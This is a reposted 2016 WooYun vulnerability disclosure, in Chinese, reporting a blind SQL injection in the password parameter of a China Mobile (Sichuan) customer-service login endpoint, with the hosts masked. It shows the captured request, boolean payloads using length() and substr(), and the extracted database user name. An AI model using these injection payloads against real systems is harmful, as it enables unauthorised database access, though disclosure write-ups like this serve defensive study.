记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

中国移动(四川省)某站存在SQL注入漏洞

2016-03-07 20:30

http://**.**.**.**/service/fee/zxkf.shtml



Snap342.jpg



点击在线咨询

会跳转到**.**.**.**:16500/ocs_gz/modules/customer/ocs.jsp



Snap344.jpg





当链接为**.**.**.**:16500/ocs_gz/modules会自动跳转到

**.**.**.**:16500/ocs_gz/index.jsp

Snap345.jpg





但是发现无论输入什么都提示null

抓包



code 区域
GET /ocs_gz/ActionService/**.**.**.**mon.LoginAction?Action=loginIn&M=0.02473225058181716&CHANNEL_ID=1&EventID=1&IP_ADDR=xxxx&LOGIN_PSWD=1&LOGIN_USRNAME=0010&MAC_ADDR=123456 HTTP/1.1

Host: **.**.**.**:16500

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Cookie: AICCOL_USER_ID=SCBY7768; SESS_ATTR_ACCESS_PORT="XXXXXXXXX(**.**.**.**):16500/ocs_gz"; JSESSIONID=620771E424EE59AFB3DA95EB1FB961A2

Connection: keep-alive





code 区域
**.**.**.**:16500/ocs_gz/ActionService/**.**.**.**mon.LoginAction?Action=loginIn&M=0.02473225058181716&CHANNEL_ID=1&EventID=1&IP_ADDR=xxxx&LOGIN_PSWD=1&LOGIN_USRNAME=0010&MAC_ADDR=123456







Snap346.jpg





Snap347.jpg





Snap348.jpg



表示登录成功

但是使用这个密码登录的话还是登录不了



查看源码view-source:**.**.**.**:16500/ocs_gz/



code 区域
window.location.href = "**.**.**.**:16500/ocs_gz/succeed.jsp";





登录成功跳转**.**.**.**:16500/ocs_gz/succeed.jsp



这里浏览器输入地址**.**.**.**:16500/ocs_gz/succeed.jsp



Snap349.jpg







虽然登录成功可惜什么都没



接下来看看sql注入





漏洞证明:

code 区域
**.**.**.**:16500/ocs_gz/ActionService/**.**.**.**mon.LoginAction?Action=loginIn&M=0.02473225058181716&CHANNEL_ID=1&EventID=1&IP_ADDR=xxxx&LOGIN_PSWD=0010'or length(user)>1 and'a'='a&LOGIN_USRNAME=0010&MAC_ADDR=123456

**.**.**.**:16500/ocs_gz/ActionService/**.**.**.**mon.LoginAction?Action=loginIn&M=0.02473225058181716&CHANNEL_ID=1&EventID=1&IP_ADDR=xxxx&LOGIN_PSWD=0010'or length(user)=7 and'a'='a&LOGIN_USRNAME=0010&MAC_ADDR=123456



**.**.**.**:16500/ocs_gz/ActionService/**.**.**.**mon.LoginAction?Action=loginIn&M=0.02473225058181716&CHANNEL_ID=1&EventID=1&IP_ADDR=xxxx&LOGIN_PSWD=0010'or length(user)=7 and'a'='a&LOGIN_USRNAME=0010&MAC_ADDR=123456

**.**.**.**:16500/ocs_gz/ActionService/**.**.**.**mon.LoginAction?Action=loginIn&M=0.02473225058181716&CHANNEL_ID=1&EventID=1&IP_ADDR=xxxx&LOGIN_PSWD=0010'or substr('a',1,1)='a' and'a'='a&LOGIN_USRNAME=0010&MAC_ADDR=123456



以上都返回1

从以上的结果可以说明用户长度为7 获取长度用length 截取用substr



接下来跑一下



Snap350.jpg





code 区域
1 97

2 105

3 97

4 100

5 109

6 105

7 110





user为aiadmin





验证一下

code 区域
**.**.**.**:16500/ocs_gz/ActionService/**.**.**.**mon.LoginAction?Action=loginIn&M=0.02473225058181716&CHANNEL_ID=1&EventID=1&IP_ADDR=*****&LOGIN_PSWD=0010'or lower(user)='aiadmin' and'a'='a&LOGIN_USRNAME=0010&MAC_ADDR=123456



Snap351.jpg







修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2016-0171340

阅读:102847 | 评论:0 | 标签:注入 漏洞 移动

想收藏或者和大家分享这篇好文章→复制链接地址

“中国移动(四川省)某站存在SQL注入漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云